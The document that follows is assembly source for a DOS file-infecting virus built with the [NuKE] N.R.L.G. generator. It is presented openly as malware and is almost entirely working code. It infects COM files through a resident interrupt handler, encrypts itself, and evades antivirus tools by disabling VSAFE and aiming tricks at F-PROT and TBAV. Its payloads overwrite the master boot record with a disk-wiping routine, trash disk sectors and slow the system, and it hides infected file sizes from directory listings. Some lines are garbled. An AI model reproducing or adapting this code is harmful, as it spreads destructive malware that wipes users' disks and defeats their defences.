;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS.        ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN  ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS                             ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR!                                 ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994                   ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

.286
code    segment
assume cs:code,ds:code
org  100h

start:  CALL NEXT 
 
NEXT:  
       mov di,sp             ;take the stack pointer location 
       mov bp,ss:[di]        ;take the "DELTA HANDLE" for my virus       
       sub bp,offset next    ;subtract the large code off this code 
                             ;
;*******************************************************************
;                      #1 DECRYPT ROUTINE                               
;*******************************************************************

cmp byte ptr cs:[crypt],0b9h ;is the first runnig?        
je crypt2                    ;yes! not decrypt              
;----------------------------------------------------------                                          
mov cx,offset fin            ;cx = large of virus               
lea di,[offset crypt]+ bp    ;di = first byte to decrypt          
mov dx,1                     ;dx = value for decrypt          
;----------------------------------------------------------                                                   
deci:                        ;deci = fuck label!                                    
;----------------------------------------------------------

ÿinc di
inc di
;----------------------------------------------------------                                                
jmp bye                      ;######## BYE BYE F-PROT ! ##########     
mov ah,4ch
int 21h
bye:                         ;#### HEY FRIDRIK! IS ONLY A JMP!!###      
;-----------------------------------------------------------                               
mov ah,0bh                   ;######### BYE BYE TBAV ! ##########     
int 21h                      ;### (CANGE INT AT YOU PLEASURE) ###        
;----------------------------------------------------------                                   
loop deci                    ;repeat please!               
                             ;           
;*****************************************************************
;                   #2 DECRYPT ROUTINE                                                    
;*****************************************************************
                              ;    
crypt:                        ;fuck label!                  
                              ;                
mov cx,offset fin             ;cx = large of virus                 
lea di,[offset crypt2] + bp   ;di = first byte to decrypt                  
;---------------------------------------------------------------                                              
deci2:                        ;              
xor byte ptr cs:[di],1        ;decrytion rutine          
inc di                        ;very simple...            
loop deci2                    ;           
;---------------------------------------------------------------
crypt2:                       ;fuck label!          
                              ;                  
MOV AX,0CACAH                 ;call to my resident interrup mask                  
INT 21H                       ;for chek "I'm is residet?"   
CMP Bh,0CAH                   ;is equal to CACA?
JE PUM2                       ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS  (SELECTABLE)
;*****************************************************************

ÿcall MBR
call TRASH_RN
call ANTI_V
;****************************************************************
;               PROCESS TO REMAIN RESIDENT                                                                  
;****************************************************************   

mov   ax,3521h                  
int   21h                        ;store the int 21 vectors 
mov   word ptr [bp+int21],bx     ;in cs:int21
mov   word ptr [bp+int21+2],es   ;
;---------------------------------------------------------------
push cs                          ; 
pop ax                           ;ax = my actual segment                             
dec ax                           ;dec my segment for look my MCB
mov es,ax                        ;
mov bx,es:[3]                    ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs                          ;   
pop es                           ;   
sub bx,(offset fin - offset start + 15)/16  ;subtract the large of my virus 
sub bx,17 + offset fin           ;and 100H for the PSP total
mov ah,4ah                       ;used memory
int 21h                          ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin     
mov ah,48h                      ;                              
int 21h                         ;request the memory to fuck DOS!                                                 
;---------------------------------------------------------------
dec ax                          ;ax=new segment 
mov es,ax                       ;ax-1= new segment MCB 
mov byte ptr es:[1],8           ;put '8' in the segment
;--------------------------------------------------------------                                
inc ax                          ; 
mov es,ax                       ;es = new segment
lea si,[bp + offset start]      ;si = start of virus 
mov di,100h                     ;di = 100H (psp position) 
mov cx,offset fin - start       ;cx = lag of virus
push cs                         ;
pop ds                          ;ds = cs
cld                             ;mov the code
rep movsb                       ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus             ;dx = new int21 handler
mov ax,2521h                    ;
push es                         ; 
pop ds                          ; 
int 21h                         ;set the vectors 
;-------------------------------------------------------------
pum2:                               ;  
                                    ; 
mov ah,byte ptr [cs:bp + real]      ;restore the 3  
mov byte ptr cs:[100h],ah           ;first bytes  
mov ax,word ptr [cs:bp + real + 1]  ;
mov word ptr cs:[101h],ax           ;
;-------------------------------------------------------------
mov ax,100h                         ;
jmp ax                              ;jmp to execute
                                    ;
;*****************************************************************
;*             HANDLER FOR THE INT 21H                                       
;*****************************************************************
                          ;          
VIRUS:                    ;  
                          ;     
cmp ah,4bh                ;is a 4b function? 
je REPRODUCCION           ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH             ;is ... a caca function? (resident chek)
jne a3                    ;no! jump to a3
mov bh,0cah               ;yes! put ca in bh
a3:                       ;
JMP dword ptr CS:[INT21]  ;jmp to original int 21h
ret                       ;    
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION:              ;       
                           ;
pushf                      ;put the register
pusha                      ;in the stack
push si                    ;
push di                    ;
push bp                    ;
push es                    ;
push ds                    ;
;-------------------------------------------------------------
push cs                    ;  
pop ds                     ;  
mov ax,3524H               ;get the dos error control                      
int 21h                    ;interupt                        
mov word ptr error,es      ;and put in cs:error                      
mov word ptr error+2,bx    ;            
mov ax,2524H               ;change the dos error control                    
mov dx,offset all          ;for my "trap mask"                      
int 21h                    ;         
;-------------------------------------------------------------
pop ds                     ;
pop es                     ;restore the registers
pop bp                     ;
pop di                     ;
pop si                     ;
popa                       ;
popf                       ;
;-------------------------------------------------------------
pushf                      ;put the registers
pusha                      ;     
push si                    ;HEY! AZRAEL IS CRAZY?
push di                    ;PUSH, POP, PUSH, POP
push bp                    ;PLEEEEEAAAAAASEEEEEEEEE
push es                    ;PURIFY THIS SHIT!
push ds                    ;
;-------------------------------------------------------------
mov ax,4300h                 ;       
int 21h                      ;get the file     
mov word ptr cs:[attrib],cx  ;atributes   
;-------------------------------------------------------------
mov ax,4301h                 ;le saco los atributos al        
xor cx,cx                    ;file 
int 21h                      ;
;-------------------------------------------------------------  
mov ax,3d02h                 ;open the file 
int 21h                      ;for read/write
mov bx,ax                    ;bx=handle
;-------------------------------------------------------------
mov ax,5700h                ;     
int 21h                     ;get the file date  
mov word ptr cs:[hora],cx   ;put the hour    
mov word ptr cs:[dia],dx    ;put the day    
and cx,word ptr cs:[fecha]  ;calculate the seconds    
cmp cx,word ptr cs:[fecha]  ;is ecual to 58? (DEDICATE TO N-POX)    
jne seguir                  ;yes! the file is infected!     
jmp cerrar                  ;
;------------------------------------------------------------
seguir:                     ;     
mov ax,4202h                ;move the pointer to end
call movedor                ;of the file
;------------------------------------------------------------
push cs                     ;   
pop ds                      ; 
sub ax,3                    ;calculate the 
mov word ptr [cs:largo],ax  ;jmp long
;-------------------------------------------------------------
mov ax,04200h               ;move the pointer to  
call movedor                ;start of file
;----------------------------------------------------------                                          
push cs                     ;   
pop ds                      ;read the 3 first bytes  
mov ah,3fh                  ;                           
mov cx,3                    ;
lea dx,[cs:real]            ;put the bytes in cs:[real]
int 21h                     ;
;----------------------------------------------------------                                          
cmp word ptr cs:[real],05a4dh   ;the 2 first bytes = 'MZ' ?
jne er1                         ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------                                          
mov ax,4200h      ;move the pointer                               
call movedor      ;to start fo file
;----------------------------------------------------------                                          
push cs           ;       
pop ds            ; 
mov ah,40h        ;  
mov cx,1          ;write the JMP
lea dx,[cs:jump]  ;instruccion in the
int 21h           ;fist byte of the file
;----------------------------------------------------------                                          
mov ah,40h         ;write the value of jmp
mov cx,2           ;in the file 
lea dx,[cs:largo]  ; 
int 21h            ;
;----------------------------------------------------------                                          
mov ax,04202h      ;move the pointer to 
call movedor       ;end of file
;----------------------------------------------------------                                          
push cs                     ;        
pop ds                      ;move the code  
push cs                     ;of my virus      
pop es                      ;to cs:end+50     
cld                         ;for encrypt          
mov si,100h                 ;    
mov di,offset fin + 50      ;      
mov cx,offset fin - 100h    ;        
rep movsb                   ;      
;----------------------------------------------------------                                          
mov cx,offset fin           
mov di,offset fin + 50 + (offset crypt2 - offset start)  ;virus         
enc:                              ;           
xor byte ptr cs:[di],1            ;encrypt the virus              
inc di                            ;code                   
loop enc                          ;              
;---------------------------------------------------------
mov cx,offset fin           
mov di,offset fin + 50 + (offset crypt - offset start)  ;virus         
mov dx,1
enc2:                              ;           

ÿinc di
inc di                             ;the virus code                  
loop enc2                          ;              
;--------------------------------------------
mov ah,40h                       ;  
mov cx,offset fin - offset start ;copy the virus              
mov dx,offset fin + 50           ;to end of file
int 21h                          ;
;----------------------------------------------------------                                          
cerrar:                          ;
                                 ;restore the       
mov ax,5701h                     ;date and time    
mov cx,word ptr cs:[hora]        ;file   
mov dx,word ptr cs:[dia]         ;     
or cx,word ptr cs:[fecha]        ;and mark the seconds  
int 21h                          ; 
;----------------------------------------------------------                                          
mov ah,3eh                       ; 
int 21h                          ;close the file
;----------------------------------------------------------                                          
pop ds                           ;
pop es                           ;restore the 
pop bp                           ;registers
pop di                           ; 
pop si                           ;
popa                             ;
popf                             ;
;----------------------------------------------------------                                          
pusha                           ;   
                                ;                                                             
mov ax,4301h                    ;restores the atributes 
mov cx,word ptr cs:[attrib]     ;of the file  
int 21h                         ;   
                                ;
popa                            ; 
;----------------------------------------------------------                                          
pushf                           ;                           
pusha                           ; 8-(  = f-prot                       
push si                         ;                       
push di                         ; 8-(  = tbav   
push bp                         ;                       
push es                         ; 8-)  = I'm                        
push ds                         ;                              
;----------------------------------------------------------                                          
mov ax,2524H                    ;                         
lea bx,error                    ;restore the                         
mov ds,bx                       ;errors handler      
lea bx,error+2                  ;                         
int 21h                         ;                       
;----------------------------------------------------------                                          
pop ds                          ;
pop es                          ;
pop bp                          ;restore the 
pop di                          ;resgisters
pop si                          ;
popa                            ;
popf                            ;
;----------------------------------------------------------                                          
JMP A3                          ;jmp to orig. INT 21
                                ;
;**********************************************************
;           SUBRUTINES AREA
;**********************************************************
                                ;
movedor:                        ;   
                                ; 
xor cx,cx                       ;use to move file pointer         
xor dx,dx                       ;       
int 21h                         ;        
ret                             ;        
;----------------------------------------------------------                                          
all:                            ;  
                                ; 
XOR AL,AL                       ;use to set 
iret                            ;error flag

;***********************************************************
;         DATA AREA
;***********************************************************
largo  dw  ?
jump   db  0e9h
real   db  0cdh,20h,0
hora   dw  ?
dia    dw  ?
attrib dw  ?
int21  dd  ?
error  dd  ?

ÿ;---------------------------------
action:                          ; 
MOV AH,2AH                       ;        
INT 21H                          ;get date           
CMP Dl,byte ptr cs:[action_dia+bp]  ;is equal to my day?                 
JE  cont                         ;nop! fuck ret          
cmp byte ptr cs:[action_dia+bp],32  ;
jne no_day                       ;
cont:                            ; 
cmp dh,byte ptr cs:[action_mes+bp]  ;is equal to my month?            
je set                           ;
cmp byte ptr cs:[action_mes+bp],13  ;
jne NO_DAY                       ;nop! fuck ret           
set:                             ; 
        
mov ax,351ch                     ;
int 21h                          ;store the int 1ch vectors 
mov word ptr [trampaint+bp],bx      ;in cs:trampaint
mov word ptr [trampaint+2+bp],es    ;
mov ax,251ch                     ;put the int 1ch (clock) vector     
push cs                          ;   
pop ds                           ;  
mov dx,offset tardar             ;in offset tardar
int 21h                          ;  
mov dx,offset fin                ;
int 27h                          ;main resident the code
NO_DAY:                          ;             
ret                              ;ret for program
tardar:                          ;int 1c handler
pushf                            ;
pusha                            ;
mov cx,0ffffh                    ;fuck loop for slow speed
trampa:                          ;
mov ax,ax                        ;
loop trampa                      ;
popa                             ;
popf                             ;
JMP dword ptr CS:[trampaint+bp]     ;jmp to original int 1ch
ret                              ;
trampaint  dd  ?                 ;
;--------------------------------;

ÿMBR:
;**************************************
;    Start of MBR-BOMB writing
;**************************************
mov ax,9f80h                ;very high memory                   
mov es,ax                   ;good for buffer                
mov ax,0201h                ;read the original         
mov cx,0001h                ;MBR of the disk           
mov dx,0080h                ;              
xor bx,bx                   ;to buffer 9f80:0000h                       
int 13h                     ;           
push cs                     ; 
pop ds                      ; 
mov ax,9f80h                ;add my MBR-BOMB                                    
mov es,ax                   ;to real MBR in my       
mov si,offset fat           ;buffer              
xor di,di                   ;                   
mov cx,105                  ;ds:[fat]=>9f80:0000h
repe movsb                  ;total 105bytes                   
mov ax,9f80h                ;   
mov es,ax                   ;   
xor bx,bx                   ;replace the original    
mov ax,0301h                ;MBR in the disk by the
xor ch,ch                   ;new MBR-BOMB.  
mov dx,0080h                ;
mov cl,1                    ;WARNING! VSAFE/MSAVE 
mov bx,0                    ;NOTIFY THIS ACTION 
int 13h                     ; 
ret                         ;
;---------------------------------------------------
;*********************      
; Start of MBR code          
;*********************        
fat:                              ;       
cli                               ;#       
xor     ax,ax                     ;#     
mov     ss,ax                     ;#       
mov     sp,7C00h                  ;#        
mov     si,sp                     ;#        
push    ax                        ;#    
pop     es                        ;# 
push    ax                        ;# 
pop     ds                        ;#     
sti                               ;#
                                  ;#   
pushf                             ;#   
push ax                           ;# 
push cx                           ;# = This code be in the
push dx                           ;#   original MBR
push ds                           ;#   (NOT MODIFY)
push es                           ;#   
MOV AH,04H                        ; Read real tyme                       
INT 1AH                           ; Clock          
CMP DH,cs:byte ptr action_mes     ; is Month?     
JE CAGO                           ; yes! SNIF SNIF HD. 
lit:
pop es
pop ds
pop dx  
pop cx
pop ax
popf
jmp booti
CAGO:
;++++++++++++++++++++++++++++++++++++++++++++++++++++
; START OF YOUR DESTRUCTIVE CODE (or not destructive)
;++++++++++++++++++++++++++++++++++++++++++++++++++++

rip_hd:                            
                              ;@                                  
                xor dx, dx    ;@                
rip_hd1:                      ;@
		mov cx, 2     ;@                 
		mov ax, 311h  ;@    
		mov dl, 80h   ;@             
		mov bx, 5000h ;@       
		mov es, bx    ;@ 
		int 13h       ;@          
		jae rip_hd2   ;@         
		xor ah, ah    ;@       
		int 13h       ;@       
		rip_hd2:      ;@        
		inc dh        ;@        
		cmp dh, 4     ;@                
		jb rip_hd1    ;@ 
		inc ch        ;@        
		jmp rip_hd            

;+++++++++++++++++++++++++++++++++++++++++++
;       END OF YOUR DESTRUCUTIVE  CODE
;+++++++++++++++++++++++++++++++++++++++++++
booti:
xor ax,ax     ;#         
mov es,ax     ;#       
mov bx,7c00h  ;#             
mov ah,02     ;#          
mov al,1      ;#         
mov cl,1      ;# #= This code be       
mov ch,0      ;#    in the original        
mov dh,1      ;#    MBR    
mov dl,80h    ;#    (NOT MODIFY)   
              ;#             
int 13h       ;#                
              ;#          
db 0eah,00,7ch,00,00 ;#    
;*******************
; END OF MBR CODE
;*******************

ÿ;---------------------------------
TRASH_RN:                        ; 
MOV AH,2DH                       ;        
INT 21H                          ;get date           
CMP Dl,6                         ;is =6 (RAN 0-99)                 
jne NO_DAYY                      ;nop! fuck ret           
mov ah,0dh                       ;     
int 21h                          ;reset disk 
mov al,2                         ;
mov cx,0ffffh                    ;
mov dx,0                         ;  
int 26h                          ;fuck ffffh sector 
mov ah,0dh                       ;reste disk  
int 21h                          ;   
mov al,2                         ;    
mov cx,0ffffh                    ;    
mov dx,0ffffh                    ;new fuck+ 
int 26h                          ;heheheh!!! 
NO_DAYY:                         ;             
ret                              ;
;---------------------------------
ÿ;---------------------------------
ANTI_V:                          ; 
MOV AX,0FA01H                    ;REMOVE VSAFE FROM MEMORY        
MOV DX,5945H                     ; 
INT 21H                          ;           
ret                              ;
;---------------------------------

ÿ;*****************************************************
dir_s:                                                               
             pushf                                                         
             push    cs                                                    
             call    a3                      ;Get file Stats                       
             test    al,al                   ;Good FCB?                            
             jnz     no_good                 ;nope                                 
             push    ax                                                 
             push    bx                                                    
             push    es                                                    
             mov     ah,51h                  ;Is this Undocmented? huh...          
             int     21h                                                   
             mov     es,bx                                                 
             cmp     bx,es:[16h]                                           
             jnz     not_infected                        
             mov     bx,dx                                                 
             mov     al,[bx]                                               
             push    ax                                                    
             mov     ah,2fh                   ;Get file DTA                         
             int     21h                                                   
             pop     ax                                                    
             inc     al                                                    
             jnz     fcb_okay                                              
             add     bx,7h                                                 
fcb_okay:    mov     ax,es:[bx+17h]                                   
             and     ax,1fh                   ;UnMask Seconds Field                 
             xor     al,byte ptr cs:fechad                                      
             jnz     not_infected                                            
             and     byte ptr es:[bx+17h],0e0h                            
             sub     es:[bx+1dh],OFFSET FIN - OFFSET START  ;Yes minus virus size       
             sbb     es:[bx+1fh],ax                                        
not_infected:pop     es                                                    
             pop     bx                                                    
             pop     ax                                                    
no_good:     iret                                                          
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX 
;*********************************************************************

ÿaction_dia Db 01H ;day for the action
action_mes Db 01H ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start